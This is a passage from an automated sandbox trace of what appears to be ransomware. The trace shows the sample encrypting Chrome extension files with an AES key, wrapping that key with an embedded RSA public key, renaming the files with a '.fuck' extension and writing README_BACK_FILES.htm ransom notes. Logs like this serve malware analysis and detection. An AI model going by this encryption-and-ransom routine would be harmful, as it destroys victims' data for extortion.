phProv=0x2b9c388*=0x28f5c60) returned 1 [0254.150] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5c60, dwCertEncodingType=0x1, pInfo=0x298e740*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e770*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e778*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e182a8) returned 1 [0254.150] CryptEncrypt (in: hKey=0x2e182a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0254.150] CryptEncrypt (in: hKey=0x2e182a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17260*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e17260*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0254.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e17260*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e17260*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0254.152] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0xe0, lpOverlapped=0x0) returned 1 [0254.153] CryptEncrypt (in: hKey=0x2985ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0xf0) returned 1 [0254.153] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0xf0, lpOverlapped=0x0) returned 1 [0254.153] CloseHandle (hObject=0x5d50) returned 1 [0254.153] CloseHandle (hObject=0x5d64) returned 1 [0254.154] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), bFailIfExists=0) returned 1 [0254.157] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js", dwFileAttributes=0x0) returned 1 [0254.158] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.gsg")) returned 1 [0254.159] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.fuck")) returned 1 [0254.160] CryptDestroyHash (hHash=0x29384f8) returned 1 [0254.160] CryptDestroyKey (hKey=0x2985ea0) returned 1 [0254.160] CryptReleaseContext (hProv=0x293aae8, dwFlags=0x0) returned 1 [0254.160] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0254.160] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e182e8 [0254.163] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.164] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.164] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18768 [0254.164] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.164] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.165] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.165] GetLastError () returned 0x0 [0254.165] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json")) returned 0x20 [0254.165] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json", dwFileAttributes=0x80) returned 1 [0254.166] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.167] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.168] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.168] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e170c8) returned 1 [0254.171] CryptCreateHash (in: hProv=0x2e170c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.171] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.171] CryptHashData (hHash=0x2e184e8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.171] CryptDeriveKey (in: hProv=0x2e170c8, Algid=0x6610, hBaseData=0x2e184e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e187a8) returned 1 [0254.171] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.171] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.171] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16f30) returned 1 [0254.172] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16f30, dwCertEncodingType=0x1, pInfo=0x298f370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f3a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f3a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e183e8) returned 1 [0254.172] CryptEncrypt (in: hKey=0x2e183e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.172] CryptEncrypt (in: hKey=0x2e183e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17590*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17590*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.173] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17590*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17590*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.174] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x84, lpOverlapped=0x0) returned 1 [0254.176] CryptEncrypt (in: hKey=0x2e187a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x84, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x90) returned 1 [0254.176] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x90, lpOverlapped=0x0) returned 1 [0254.176] CloseHandle (hObject=0x5d60) returned 1 [0254.176] CloseHandle (hObject=0x5d5c) returned 1 [0254.176] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), bFailIfExists=0) returned 1 [0254.180] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json", dwFileAttributes=0x0) returned 1 [0254.181] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.gsg")) returned 1 [0254.183] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json.fuck")) returned 1 [0254.184] CryptDestroyHash (hHash=0x2e184e8) returned 1 [0254.184] CryptDestroyKey (hKey=0x2e187a8) returned 1 [0254.184] CryptReleaseContext (hProv=0x2e170c8, dwFlags=0x0) returned 1 [0254.184] FindNextFileA (in: hFindFile=0x2e18768, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.185] FindClose (in: hFindFile=0x2e18768 | out: hFindFile=0x2e18768) returned 1 [0254.185] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\readme_back_files.htm")) returned 0xffffffff [0254.185] AreFileApisANSI () returned 1 [0254.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.185] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.186] GetFileType (hFile=0x5d50) returned 0x1 [0254.186] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.190] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.190] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18428 [0254.191] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.191] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.191] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.191] GetLastError () returned 0x0 [0254.191] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json")) returned 0x20 [0254.192] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json", dwFileAttributes=0x80) returned 1 [0254.193] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.194] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.195] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.196] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e169e0) returned 1 [0254.199] CryptCreateHash (in: hProv=0x2e169e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.199] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.199] CryptHashData (hHash=0x2e180e8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.199] CryptDeriveKey (in: hProv=0x2e169e0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18668) returned 1 [0254.199] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.199] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.199] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16d98) returned 1 [0254.200] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16d98, dwCertEncodingType=0x1, pInfo=0x298f6b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f6e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f6e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18268) returned 1 [0254.200] CryptEncrypt (in: hKey=0x2e18268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.200] CryptEncrypt (in: hKey=0x2e18268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17370*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17370*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.200] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17370*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17370*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.202] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x103, lpOverlapped=0x0) returned 1 [0254.203] CryptEncrypt (in: hKey=0x2e18668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x103, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0254.203] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0254.204] CloseHandle (hObject=0x5d5c) returned 1 [0254.204] CloseHandle (hObject=0x5d60) returned 1 [0254.204] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), bFailIfExists=0) returned 1 [0254.210] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json", dwFileAttributes=0x0) returned 1 [0254.211] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.gsg")) returned 1 [0254.212] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.fuck")) returned 1 [0254.214] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0254.214] CryptDestroyKey (hKey=0x2e18668) returned 1 [0254.214] CryptReleaseContext (hProv=0x2e169e0, dwFlags=0x0) returned 1 [0254.214] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.214] FindClose (in: hFindFile=0x2e18428 | out: hFindFile=0x2e18428) returned 1 [0254.215] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\README_BACK_FILES.htm" (normalized: 